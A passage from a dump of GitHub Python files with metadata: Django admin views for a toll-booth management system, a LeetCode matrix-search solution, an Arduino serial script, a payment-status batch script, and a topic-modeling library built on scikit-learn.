JsonResponse(message)\n else:\n lobj.save()\n message = {'message': 'Success'}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteLocation(request, pk):\n lob = AddLocations.objects.get(pk=pk)\n lob.isdeleted = True\n if AddRoute.objects.filter(SourceLoc=pk, isdeleted=False).exists() | AddRoute.objects.filter(DestinationLoc=pk, isdeleted=False).exists():\n distdat = AddDistrict.objects.filter(isdeleted=False)\n locdat = AddLocations.objects.select_related().filter(isdeleted=False)\n context = {\n 'nolocation': 'Can\\'t Delete, Because {} is already in route'.format(lob.CityName),\n 'distdat':distdat, 'locdata':locdat\n }\n return render(request, \"AdminDashboard/adminDistrictLocations.html\", context)\n else:\n lob.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListDistrict')\n\n\ndef ListDistrictsLocation(request):\n distdat = AddDistrict.objects.filter(isdeleted=False)\n locdat = AddLocations.objects.select_related().filter(isdeleted=False)\n return render(request, \"AdminDashboard/adminDistrictLocations.html\", {'distdat':distdat, 'locdata':locdat})\n\n\ndef AddVehicleType(request):\n if request.method == \"POST\":\n vehtype = request.POST.get('vehtype')\n\n vehobj = AddVehicle()\n vehobj.VehicleType = vehtype\n vehobj.isdeleted = False\n if AddVehicle.objects.filter(VehicleType=vehtype, isdeleted=False).exists():\n messages.warning(request, \"Already Exist!\")\n return HttpResponseRedirect('/admindash/ListVehicleType')\n else:\n vehobj.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListVehicleType')\n return render(request, \"AdminDashboard/adminAddVehType.html\")\n\n\ndef EditVehicleType(request, pk):\n vob = AddVehicle.objects.get(pk=pk)\n data = {\n 'Id': vob.pk,\n 'VehicleType': vob.VehicleType,\n }\n return JsonResponse(data)\n\n\ndef UpdateVehicleType(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n vname = request.POST.get('VehicleType')\n vobj = AddVehicle.objects.get(pk=id)\n vobj.VehicleType = vname\n if AddVehicle.objects.filter(VehicleType=vname).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exist!\")\n return JsonResponse(message)\n else:\n vobj.save()\n message = {'message': 'Success'}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteVehicleType(request, pk):\n vob = AddVehicle.objects.get(pk=pk)\n vob.isdeleted = True\n if AddPriceCharge.objects.filter(VehicleTypeID=pk, isdeleted=False).exists():\n vehicleobj = AddVehicle.objects.filter(isdeleted=False)\n context = {\n 'novehicle': 'Can\\'t Delete, Because there is an existing data for {}'.format(vob.VehicleType),\n 'vehicleobj': vehicleobj\n }\n return render(request, \"AdminDashboard/adminAddVehType.html\", context)\n else:\n vob.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListVehicleType')\n\n\ndef ListVehicleType(request):\n vehicleobj = AddVehicle.objects.filter(isdeleted=False)\n return render(request, \"AdminDashboard/adminAddVehType.html\", {'vehicleobj': vehicleobj})\n\n\ndef EditProfile(request):\n return render(request, \"AdminDashboard/adminEditProfile.html\")\n\n\ndef UpdateProfile(request):\n if request.method == \"POST\":\n username = request.POST.get('username')\n firstname = request.POST.get('firstname')\n lastname = request.POST.get('lastname')\n address = request.POST.get('address')\n email = request.POST.get('email')\n phone = request.POST.get('mobile')\n\n id = request.session['userid']\n logobj = Login.objects.get(pk=id)\n logobj.username = username\n logobj.save()\n regobj = Registration.objects.get(loginid=id)\n regobj.FirstName = firstname\n regobj.LastName = lastname\n regobj.Address = address\n regobj.Email = email\n regobj.Phone = phone\n if phone.isdigit() and len(phone) == 10 or len(phone) == 12:\n regobj.save()\n messages.success(request, \"Updated Successfully\")\n return HttpResponseRedirect('/admindash/EditProfile')\n else:\n return render(request, \"AdminDashboard/adminEditProfile.html\", {'number': 'Invalid Number'})\n return render(request, \"AdminDashboard/adminEditProfile.html\")\n\n\ndef UpdatePassword(request):\n id = request.session['userid']\n if request.method == \"POST\":\n password = request.POST.get('newpassword')\n logobj = Login.objects.get(pk=id)\n logobj.password = make_password(password, salt=None, hasher='default')\n logobj.save()\n messages.success(request, \"Password Changed Successfully\")\n return HttpResponseRedirect('/admindash/EditProfile')\n return render(request, \"AdminDashboard/adminEditProfile.html\")\n\n\ndef SetRoute(request):\n location = AddLocations.objects.filter(isdeleted=False)\n routeob = AddRoute.objects.select_related().filter(isdeleted=False)\n if request.method == \"POST\":\n routname = request.POST.get('routename')\n sourcel = request.POST.get('slocation')\n destinationl = request.POST.get('dlocation')\n routeobj = AddRoute()\n routeobj.RouteName = routname\n sloc = AddLocations.objects.get(CityName=sourcel, isdeleted=False)\n dloc = AddLocations.objects.get(CityName=destinationl, isdeleted=False)\n routeobj.SourceLoc = sloc\n routeobj.DestinationLoc = dloc\n routeobj.isdeleted = False\n if AddRoute.objects.filter(RouteName=routname).filter(isdeleted=False).exists():\n messages.warning(request, \"Already Exist!\")\n return HttpResponseRedirect('/admindash/ListRoutes')\n elif sloc == dloc:\n messages.warning(request, \"Same Location is not Possible\")\n return HttpResponseRedirect('/admindash/ListRoutes')\n else:\n routeobj.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListRoutes')\n return render(request, \"AdminDashboard/adminListRoute.html\", {'location': location,'routeobj':routeob})\n\n\ndef EditRoute(request, pk):\n rob = AddRoute.objects.get(pk=pk)\n data = {\n 'Id': rob.pk,\n 'RouteName': rob.RouteName,\n 'SourceLoc': rob.SourceLoc.CityName,\n 'DestinationLoc': rob.DestinationLoc.CityName,\n }\n return JsonResponse(data)\n\n\ndef UpdateRoute(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n rname = request.POST.get('RouteName')\n sloc = request.POST.get('SourceLoc')\n dloc = request.POST.get('DestinationLoc')\n slocobj = AddLocations.objects.get(CityName=sloc, isdeleted=False)\n dlocobj = AddLocations.objects.get(CityName=dloc, isdeleted=False)\n robj = AddRoute.objects.get(pk=id)\n robj.RouteName = rname\n robj.SourceLoc = slocobj\n robj.DestinationLoc = dlocobj\n if AddRoute.objects.filter(RouteName=rname).filter(SourceLoc=slocobj.id).filter(DestinationLoc=dlocobj.id).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exists!\")\n return JsonResponse(message)\n elif slocobj == dlocobj:\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Same Location is not Possible\")\n return JsonResponse(message)\n else:\n robj.save()\n message = {'error': \"Updated Successfully\"}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteRoute(request, pk):\n rt = AddRoute.objects.get(pk=pk)\n rt.isdeleted = True\n if AddToll.objects.filter(RouteID=pk, isdeleted=False).exists():\n location = AddLocations.objects.filter(isdeleted=False)\n routeob = AddRoute.objects.select_related().filter(isdeleted=False)\n context = {\n 'noroute': 'Can\\'t Delete, Because there is an existing TollBooth in {}'.format(rt.RouteName),\n 'routeobj': routeob, 'location': location,\n }\n return render(request, \"AdminDashboard/adminListRoute.html\", context)\n else:\n rt.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListRoutes')\n\n\ndef ListRoutes(request):\n location = AddLocations.objects.filter(isdeleted=False)\n routeob = AddRoute.objects.select_related().filter(isdeleted=False)\n return render(request, \"AdminDashboard/adminListRoute.html\", {'routeobj': routeob, 'location': location})\n\n\ndef AddTollBooths(request):\n tolls = AddToll.objects.select_related().filter(isdeleted=False)\n routes = AddRoute.objects.filter(isdeleted=False)\n if request.method == 'POST':\n tollname = request.POST.get('tollname')\n routename = request.POST.get('route')\n\n routeobject = AddRoute.objects.get(RouteName=routename)\n tolobject = AddToll()\n tolobject.TollName = tollname\n tolobject.RouteID = routeobject\n tolobject.isdeleted = False\n if AddToll.objects.filter(TollName=tollname, isdeleted=False).exists():\n messages.warning(request, \"Already Exist!\")\n return HttpResponseRedirect('/admindash/ListToll')\n else:\n tolobject.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListToll')\n return render(request, \"AdminDashboard/adminListToll.html\", {'routes':routes, 'tolls':tolls})\n\n\ndef EditTolls(request, pk):\n tob = AddToll.objects.get(pk=pk)\n data = {\n 'Id': tob.pk,\n 'TollName': tob.TollName,\n 'RouteID': tob.RouteID.RouteName,\n }\n return JsonResponse(data)\n\n\ndef UpdateTolls(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n tname = request.POST.get('TollName')\n rloc = request.POST.get('RouteID')\n robj = AddRoute.objects.get(RouteName=rloc)\n tobj = AddToll.objects.get(pk=id)\n tobj.TollName = tname\n tobj.RouteID = robj\n if AddToll.objects.filter(TollName=tname).filter(RouteID=robj.id).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exists!\")\n return JsonResponse(message)\n else:\n tobj.save()\n message = {'error': \"Updated Successfully\"}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteTolls(request, pk):\n tob = AddToll.objects.get(pk=pk)\n tob.isdeleted = True\n if AddPriceCharge.objects.filter(TollID=pk, isdeleted=False).exists():\n routes = AddRoute.objects.filter(isdeleted=False)\n tolls = AddToll.objects.select_related().filter(isdeleted=False)\n context = {\n 'routes':routes, 'tolls': tolls,\n 'notoll': 'Can\\'t Delete, Because there is an existing data for the TollBooth {}'.format(tob.TollName),\n }\n return render(request, \"AdminDashboard/adminListToll.html\", context)\n else:\n tob.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListToll')\n\n\ndef ListTollBooths(request):\n routes = AddRoute.objects.filter(isdeleted=False)\n tolls = AddToll.objects.select_related().filter(isdeleted=False)\n return render(request, \"AdminDashboard/adminListToll.html\", {'routes':routes, 'tolls': tolls})\n\n\ndef SetCharges(request):\n if request.method == \"POST\":\n vehiclename = request.POST.get('vehtype')\n tollname = request.POST.get('tollnam')\n tobj = AddToll.objects.get(TollName=tollname, isdeleted=False)\n vobj = AddVehicle.objects.get(VehicleType=vehiclename, isdeleted=False)\n amount = request.POST.get('amount')\n\n ChargeObj = AddPriceCharge()\n ChargeObj.VehicleTypeID = vobj\n ChargeObj.TollID = tobj\n\n if AddPriceCharge.objects.filter(TollID=tobj.id).filter(VehicleTypeID=vobj.id).filter(isdeleted=False).exists():\n messages.warning(request, \"Already Exists!\")\n return HttpResponseRedirect('/admindash/ListCharge')\n else:\n ChargeObj.Amount = amount\n ChargeObj.save()\n messages.success(request, \"Added Successfully\")\n return HttpResponseRedirect('/admindash/ListCharge')\n\n\ndef EditCharge(request, pk):\n cob = AddPriceCharge.objects.get(pk=pk)\n data = {\n 'Id': cob.pk,\n 'VehicleTypeID': cob.VehicleTypeID.VehicleType,\n 'TollID': cob.TollID.TollName,\n 'Amount': cob.Amount\n }\n return JsonResponse(data)\n\n\ndef UpdateCharge(request):\n if request.POST.get('action') == 'post':\n id = request.POST.get('id')\n vname = request.POST.get('VehicleTypeID')\n tname = request.POST.get('TollID')\n amnt = request.POST.get('Amount')\n vobj = AddVehicle.objects.get(VehicleType=vname, isdeleted=False)\n tobj = AddToll.objects.get(TollName=tname, isdeleted=False)\n cobj = AddPriceCharge.objects.get(pk=id)\n cobj.VehicleTypeID = vobj\n cobj.TollID = tobj\n cobj.Amount = amnt\n if AddPriceCharge.objects.filter(TollID=tobj.id).filter(VehicleTypeID=vobj.id).filter(Amount=amnt).filter(isdeleted=False).exists():\n message = {'error': \"Already exists\"}\n messages.warning(request, \"Already Exists!\")\n return JsonResponse(message)\n else:\n cobj.save()\n message = {'error': \"Updated Successfully\"}\n messages.success(request, \"Updated Successfully\")\n return JsonResponse(message)\n\n\ndef DeleteCharge(request, pk):\n cob = AddPriceCharge.objects.get(pk=pk)\n cob.isdeleted = True\n if Booking.objects.filter(AmountID=pk, isCanceled=False, isExpired=False).exists():\n stoll = AddToll.objects.filter(isdeleted=False)\n vtype = AddVehicle.objects.filter(isdeleted=False)\n charge = AddPriceCharge.objects.select_related().filter(isdeleted=False)\n context = {\n 'vtype':vtype, 'charge':charge, 'stoll': stoll,\n 'nocharge': 'Can\\'t Delete, Because there is an existing data for the amount Rs. {}'.format(cob.Amount),\n }\n return render(request, \"AdminDashboard/adminSetCharge.html\", context)\n else:\n cob.save()\n messages.error(request, \"Deleted Successfully\")\n return HttpResponseRedirect('/admindash/ListCharge')\n\n\ndef ListCharges(request):\n stoll = AddToll.objects.filter(isdeleted=False)\n vtype = AddVehicle.objects.filter(isdeleted=False)\n charge = AddPriceCharge.objects.select_related().filter(isdeleted=False)\n return render(request, \"AdminDashboard/adminSetCharge.html\", {'vtype':vtype, 'charge':charge, 'stoll': stoll})\n\n\ndef BookingHistory(request):\n return render(request, \"AdminDashboard/adminBookingHistory.html\")\n\n\n","repo_name":"iamdonmathew/tollbooth-management-system","sub_path":"AdminDashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"7792217813","text":"class Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n # Solution 1\n # This is the easiest way, beat 27.93% at 2019.3.27\n # Just iterate all of the numbers in every list[list]\n if not matrix: #If matrix is [] then it should return False\n # BTW, if it's \"if len(matrix) == 0:\" will only beat 2.68%\n # I guess it's beacuse it has to execute twice. Fst, len(matrix) Snd, compare to 0\n return False\n for i in range(len(matrix)):\n if target in matrix[i]:\n return True\n\n \n # Solution 2 and 3 are both bisection, almost the same\n if not matrix:\n return False\n row, col = len(matrix), len(matrix[0])\n low, high = 0, row * col - 1\n\n while low <= high: # when low > high, the list run out\n mid = (low + high) // 2\n # a[x] = matrix[x / m][x % m]\n mid_elem = matrix[mid // col][mid % col] # // in python3 means not decimal\n if mid_elem == target:\n return True\n elif mid_elem < target:\n low = mid + 1\n else:\n high = mid - 1\n return False # The list run out and should return a False \n\n\n # Solution 3\n # from functools import reduce (No need to explain how to import, right?)\n if not matrix:\n return False\n # reduce((lambda x, y: x * y), [1, 2, 3, 4]) == 1*2*3*4\n # It applies a rolling computation to sequential pairs of values in a list.\n new_matrix = reduce(lambda x, y: x + y, matrix) # Turn the matrix to normal list.\n low, high = 0, len(new_matrix)-1\n while low <= high:\n mid = (low + high) // 2\n if new_matrix[mid] == target:\n return True\n elif new_matrix[mid] < target:\n low = mid + 1\n else:\n high = mid - 1\n return False\n","repo_name":"HappyJoo/LeetCodegarbage","sub_path":"python3/074_Search_a_2D_Matrix.py","file_name":"074_Search_a_2D_Matrix.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5909317473","text":"import serial\nimport time\nimport study_load\nimport study_shuffle\n\narduino = serial.Serial(port='/dev/cu.usbmodem101', baudrate=9600, timeout=1)\n\ndef write_data(x):\n try:\n arduino.write(bytes(x, 'utf-8'))\n except serial.SerialException:\n time.sleep(0.1)\n \n time.sleep(0.5)\n\ndef read_data():\n try:\n arduino.flushInput()\n except Exception as e:\n time.sleep(0.1)\n data = arduino.readline().decode(\"utf-8\")\n return data\n\n# Load all YouTube Urls\nbrowser = study_load.driverSetup()\ncategories = study_load.loadUrls(browser)\nqueries = ['anime', 'beach', 'window', 'r&b', 'white noise']\n\nbuttonTrigger = '1'\nleft = set(\"2\".split())\nup = set(\"3\".split())\nright = set(\"4\".split())\ndown = set(\"5\".split())\nsix = set(\"6\".split())\n\nwhile True:\n joyMoved = False\n buttonPressed = False\n choice = 0\n #Enable joystick\n write_data(\"j\")\n print(\"๑ ⋆˚₊⋆────ʚ Pick a category to continue ɞ────⋆˚₊⋆ ๑\")\n while not buttonPressed:\n try:\n value = read_data()\n except serial.SerialException:\n time.sleep(0.1)\n set1 = set(value.split())\n \n if set1 == left:\n choice = 1\n elif set1 == up:\n choice = 2\n elif set1 == right:\n choice = 3\n elif set1 == down:\n choice = 4\n elif set1 == six:\n choice = 5\n if choice != 0:\n # Enable button\n write_data(\"b\")\n print(queries[choice-1] + \" chosen\")\n try:\n value = read_data()\n except serial.SerialException:\n time.sleep(0.1)\n set1 = set(value.split())\n set2 = set(buttonTrigger.split())\n if set1 == set2 and choice != 0:\n # Disable button and joystick\n write_data(\"d\")\n buttonPressed = True\n write_data(\"g\")\n study_shuffle.shuffle(categories, choice)","repo_name":"soapsrc/study-shuffle","sub_path":"button/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16767411016","text":"import datetime\nimport logging\n\nfrom sqlalchemy.sql.functions import func\n\nfrom pcapi.core.bookings.api import mark_bookings_as_reimbursed_from_payment_ids\nfrom pcapi.models import db\nfrom pcapi.models.payment import Payment\nfrom pcapi.models.payment_status import PaymentStatus\nfrom pcapi.models.payment_status import TransactionStatus\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_payments_ids_under_review(min_id: int, batch_size: int, transaction_label: str) -> list[int]:\n payments_ids_query = (\n Payment.query.filter(Payment.transactionLabel == transaction_label)\n .filter(Payment.id.between(min_id, min_id + batch_size - 1))\n .join(PaymentStatus)\n .filter(PaymentStatus.status == TransactionStatus.UNDER_REVIEW)\n .group_by(Payment.id)\n .having(func.count(\"*\") > 0)\n .order_by(Payment.id)\n .with_entities(Payment.id)\n )\n\n return [payment_id for payment_id, in payments_ids_query.all()]\n\n\ndef mark_payments_as_sent(transaction_label: str, batch_size: int = 1000) -> None:\n modified_sum = 0\n min_id = db.session.query(func.min(Payment.id)).filter(Payment.transactionLabel == transaction_label).scalar()\n max_id = db.session.query(func.max(Payment.id)).filter(Payment.transactionLabel == transaction_label).scalar()\n\n if min_id is None or max_id is None:\n logger.info(\"No payments needed to be marked as sent\")\n return\n\n now = datetime.datetime.utcnow()\n for batch_start in range(min_id, max_id + 1, batch_size):\n payments_ids = get_payments_ids_under_review(batch_start, batch_size, transaction_label)\n if len(payments_ids) == 0:\n continue\n\n payment_statuses_to_add: list[PaymentStatus] = []\n for payment_id in payments_ids:\n payment_statuses_to_add.append(PaymentStatus(paymentId=payment_id, status=TransactionStatus.SENT, date=now))\n\n db.session.bulk_save_objects(payment_statuses_to_add)\n mark_bookings_as_reimbursed_from_payment_ids(payments_ids, now)\n db.session.commit()\n\n modified_sum += len(payments_ids)\n\n logger.info(\"%d payments have been marked as sent for transaction %s\", modified_sum, transaction_label)\n","repo_name":"pass-culture/pass-culture-api","sub_path":"api/src/pcapi/scripts/payment/mark_payments_as_sent.py","file_name":"mark_payments_as_sent.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"34"} +{"seq_id":"13451695493","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom dataclasses import dataclass\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\n@dataclass\nclass ETACorpus():\n\n corpus:pd.DataFrame = None\n doc_content_col:str = 'doc_content'\n doc_id_col:str = 'doc_id'\n corpus_db:str = ''\n n_words:int = 5000\n max_df:float = .95\n min_df:float = 2\n stop_words:str = 'english'\n ngram_min:int = 1\n ngram_max:int = 3\n\n def __post_init__(self):\n self.corpus = self.corpus.reset_index().set_index(self.doc_id_col)\n return self\n\n def create_bow(self):\n \n print(\"Initializing Count Engine.\")\n self.count_engine = CountVectorizer(\n max_df=self.max_df, \n min_df=self.min_df,\n lowercase=True, \n max_features=self.n_words,\n stop_words=self.stop_words, \n ngram_range=(self.ngram_min, self.ngram_max))\n \n print(\"Generating Count Model.\")\n self.count_model = self.count_engine.fit_transform(self.corpus[self.doc_content_col])\n \n print(\"Initializing TFIDF Engine.\")\n self.tfidf_engine = TfidfTransformer()\n \n print(\"Generating TFIDF Model.\")\n self.tfidf_model = self.tfidf_engine.fit_transform(self.count_model)\n\n print(\"Extracting VOCABulary.\")\n self.VOCAB = pd.DataFrame(self.count_engine.get_feature_names(), \n columns=['term_str'])\n self.VOCAB.index.name = 'term_id'\n self.termlist = self.VOCAB.term_str.to_list()\n\n print(\"Creating Bag of Words table.\")\n \n A = pd.DataFrame(self.count_model.toarray()).stack()\n A = (A[A > 0]).to_frame('n')\n A.index.names = ['doc_id','term_id']\n\n B = pd.DataFrame(self.tfidf_model.toarray()).stack()\n B = (B[B > 0]).to_frame('tfidf')\n B.index.names = ['doc_id','term_id']\n \n self.BOW = pd.merge(A, B, on=['doc_id','term_id'])\n\n print(\"Applying stats to VOCAB.\")\n self.VOCAB['ngram_len'] = self.VOCAB.apply(lambda x: len(x.term_str.split()), 1)\n self.VOCAB['tfidf_sum'] = self.BOW.groupby(['term_id'])['tfidf'].sum() \n self.VOCAB['tfidf_mean'] = self.BOW.groupby(['term_id'])['tfidf'].mean() \n self.VOCAB['corpus_freq'] = self.BOW.groupby(['term_id'])['n'].sum()\n self.VOCAB['prior_prob'] = self.VOCAB['corpus_freq'] / self.VOCAB['corpus_freq'].sum()\n\n return self # For chaining\n\n def get_doc_term_matrix(self, bow_col='n'):\n dtm = self.BOW[bow_col].to_frame().unstack(fill_value=0)\n dtm.columns = dtm.columns.droplevel(0)\n return dtm\n\n def get_count_doc_term_matrix(self):\n return self.get_doc_term_matrix('n')\n\n def get_tfidf_doc_term_matrix(self):\n return self.get_doc_term_matrix('tfidf')\n\n\nfrom abc import ABC, abstractmethod\nimport scipy.cluster.hierarchy as sch\nimport prince\nfrom scipy.spatial.distance import pdist\nfrom sklearn.cluster import AgglomerativeClustering\nimport matplotlib.pyplot as plt\n\n@dataclass\nclass AbstractTopicModel(ABC):\n\n corpus:ETACorpus = None\n n_topics:int = 20\n engine:object = None\n model:object = None\n doc_topic_matrix:pd.DataFrame = None\n term_topic_matrix:pd.DataFrame = None\n topic:pd.DataFrame = None\n hca_pdist_metric:str = 'cosine'\n hca_linkage_method:str = 'ward'\n\n @abstractmethod\n def generate_model(self):\n pass\n\n def _create_topic_label(self, topic_id, term_topic_matrix, \n ascending=False, n_terms=7):\n topic_label = f\"{topic_id}: \" + ', '.join(term_topic_matrix[topic_id]\\\n .sort_values(ascending=ascending).head(n_terms)\\\n .index.to_list())\n return topic_label\n\n def get_term_network(self, n_pairs=1000):\n self.term_net = self.term_topic_matrix.T.corr()\\\n .stack().sort_values(ascending=False)\\\n .to_frame('corr').head(n_pairs)\n self.term_net.index.names = ['term1', 'term2']\n self.term_net = self.term_net.reset_index()\n\n self.term_net = self.term_net.loc[self.term_net.term1 != self.term_net.term2]\n self.term_net['key'] = self.term_net.apply(lambda x: '|'.join(sorted([x.term1, x.term2])), 1)\n self.term_net = self.term_net.drop_duplicates(subset='key')\n self.term_net = self.term_net.drop('key', 1)\n \n W = (self.term_topic_matrix[self.term_topic_matrix > 0]).sum(1)\n self.term_net['term_weight'] = self.term_net.apply(lambda x: W.loc[x.term1] * W.loc[x.term2], 1)\n self.term_net['weight'] = self.term_net.apply(lambda x: x['term_weight'] * x['corr'], 1)\n self.term_net = self.term_net.sort_values('weight', ascending=False)\n\n def collapse_doc_term_matrix(self, group_col, agg_func='mean'):\n df = self.corpus.corpus.merge(self.doc_topic_matrix, \n on=self.corpus.doc_id_col).groupby(group_col).agg(agg_func)\n return df\n \n def plot_hca(self, group_col='doc_label'):\n df = self.corpus.corpus.merge(self.doc_topic_matrix, on=self.corpus.doc_id_col)\\\n .groupby(group_col).mean()\n labels = df.apply(lambda x: x.name, 1).tolist()\n sims = pdist(df, metric=self.hca_pdist_metric)\n tree = sch.linkage(sims, method=self.hca_linkage_method)\n fig, axes = plt.subplots(figsize=(7, len(labels) / 2))\n dendrogram = sch.dendrogram(tree, labels=labels, orientation=\"left\")\n axes.tick_params(axis='both', which='major', labelsize=15) \n\n # Consider binding these features to the topic table\n def get_topic_corr_matrix(self):\n dtmc = self.doc_topic_matrix.cov()\n dtmc = dtmc[dtmc > 0].fillna(0)\n dtmc = np.square(dtmc)\n return dtmc\n\n\nfrom sklearn.decomposition import NMF\n\n@dataclass \nclass NMFTopicModel(AbstractTopicModel):\n\n nmf_max_iter:int = 1000\n nmf_alpha:float = .1\n nmf_l1_ratio:float = .5\n nmf_beta_loss:str = 'frobenius' #'kullback-leibler'\n nmf_solver:str = 'cd'\n nmf_random_state:int = 1\n nmf_init:str = 'nndsvd'\n\n def generate_model(self):\n\n print(\"Initializing NMF Engine.\")\n self.engine = NMF(\n n_components = self.n_topics, \n init = self.nmf_init,\n solver = self.nmf_solver, \n beta_loss = self.nmf_beta_loss, \n max_iter = self.nmf_max_iter, \n random_state = self.nmf_random_state, \n alpha = self.nmf_alpha,\n l1_ratio = self.nmf_l1_ratio)\n\n print(\"Generating NMF Model.\")\n self.model = self.engine.fit_transform(self.corpus.tfidf_model)\n\n print(\"Extracting NMF Doc-Topic Matrix.\")\n self.doc_topic_matrix = pd.DataFrame(self.model)\n self.doc_topic_matrix.index.name = 'doc_id'\n self.doc_topic_matrix.columns.name = 'topic_id'\n\n print(\"Extracting NMF Term-Topic Matrix.\")\n self.term_topic_matrix = pd.DataFrame(self.engine.components_, \n columns=self.corpus.termlist).T\n self.term_topic_matrix.index.name = 'term_str' \n self.term_topic_matrix.columns.name = 'topic_id' \n\n print(\"Extracting NMF Topics.\")\n self.topic = self.doc_topic_matrix.sum().to_frame('preponderance')\n self.topic.index.name = 'topic_id'\n self.topic['label'] = self.topic.apply(lambda x: \\\n self._create_topic_label(x.name, self.term_topic_matrix), 1)\n \n return self\n\n\nfrom sklearn.decomposition import LatentDirichletAllocation\n\n@dataclass \nclass LDATopicModel(AbstractTopicModel):\n\n lda_max_iter:int = 10\n lda_learning_method:str = 'online'\n lda_learning_offset:float = 50.\n lda_random_state:int = 0\n\n def generate_model(self):\n\n print(\"Initializing LDA Engine.\")\n self.engine = LatentDirichletAllocation(\n n_components = self.n_topics, \n max_iter = self.lda_max_iter,\n learning_method = self.lda_learning_method,\n learning_offset = self.lda_learning_offset, \n random_state = self.lda_random_state)\n \n print(\"Generating LDA Model.\")\n self.model = self.engine.fit_transform(self.corpus.count_model)\n\n print(\"Extracting LDA Doc-Topic Matrix.\")\n self.doc_topic_matrix = pd.DataFrame(self.model)\n self.doc_topic_matrix.index.name = 'doc_id'\n self.doc_topic_matrix.columns.name = 'topic_id'\n\n print(\"Extracting LDA Term-Topic Matrix.\")\n self.term_topic_matrix = pd.DataFrame(self.engine.components_, \n columns=self.corpus.termlist).T\n self.term_topic_matrix.index.name = 'term_str'\n self.term_topic_matrix.columns.name = 'topic_id'\n\n print(\"Extracting LDA Topics.\")\n self.topic = self.doc_topic_matrix.sum().to_frame('preponderance')\n self.topic.index.name = 'topic_id'\n self.topic['label'] = self.topic.apply(lambda x: \\\n self._create_topic_label(x.name, self.term_topic_matrix), 1)\n\n return self\n\nfrom sklearn.decomposition import PCA\n\n@dataclass\nclass PCATopicModel(AbstractTopicModel):\n \n pca_n_components:int = 10\n \n def generate_model(self):\n\n print(\"Initializing PCA Engine.\")\n self.engine = PCA(n_components=self.pca_n_components)\n \n print(\"Generating PCA Model.\")\n self.model = self.engine.fit_transform(self.corpus.tfidf_model.toarray())\n\n print(\"Extracting PCA Doc-Topic Matrix.\")\n self.doc_topic_matrix = pd.DataFrame(self.model)\n self.doc_topic_matrix.index.name = 'doc_id'\n\n print(\"Extracting PCA Term-Topic Matrix (i.e. Loadings).\")\n self.term_topic_matrix = pd.DataFrame(self.engine.components_.T * \\\n np.sqrt(self.engine.explained_variance_))\n self.term_topic_matrix.index = self.corpus.termlist\n self.term_topic_matrix.index.name = 'term_id' \n \n print(\"Extract PCA Topics (i.e. Components).\")\n self.topic = pd.DataFrame(self.engine.explained_variance_, columns=\"preponderance\")\n self.topic.index.name = 'topic_id'\n \n self.topic['label'] = self.topic\\\n .apply(lambda x: self._create_topic_label(x.name, \n self.term_topic_matrix), 1)\n\n self.topic['label_neg'] = self.topic\\\n .apply(lambda x: self._create_topic_label(x.name, \n self.term_topic_matrix, ascending=True), 1)\n\n return self\n\nfrom sklearn.decomposition import TruncatedSVD as SVD\n\n@dataclass\nclass SVDTopicModel(AbstractTopicModel):\n \n n_components:int = 10\n n_iter:int = 7\n random_state:int = 42\n \n def generate_model(self):\n\n print(\"Initializing SVD Engine.\")\n self.engine = SVD(n_components=self.n_components, \n n_iter=self.n_iter, \n random_state=self.random_state)\n \n print(\"Generating SVD Model.\")\n self.model = self.engine.fit_transform(self.corpus.tfidf_model.toarray())\n\n print(\"Extracting SVD Doc-Topic Matrix.\")\n self.doc_topic_matrix = pd.DataFrame(self.model)\n self.doc_topic_matrix.index.name = 'doc_id'\n\n print(\"Extracting SVD Term-Topic Matrix (i.e. Loadings).\")\n self.term_topic_matrix = pd.DataFrame(self.engine.components_.T * \\\n np.sqrt(self.engine.explained_variance_))\n self.term_topic_matrix.index = self.corpus.termlist\n self.term_topic_matrix.index.name = 'term_id' \n \n print(\"Extract SVD Topics (i.e. Components).\")\n self.topic = pd.DataFrame(self.engine.explained_variance_, columns='preponderance')\n self.topic.index.name = 'topic_id'\n \n self.topic['label'] = self.topic\\\n .apply(lambda x: self._create_topic_label(x.name, \n self.term_topic_matrix), 1)\n\n self.topic['label_neg'] = self.topic\\\n .apply(lambda x: self._create_topic_label(x.name, \n self.term_topic_matrix, ascending=True), 1)\n\n return self\n","repo_name":"ontoligent/TAPI_Topic_Models","sub_path":"lib/etal.py","file_name":"etal.py","file_ext":"py","file_size_in_byte":12334,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} 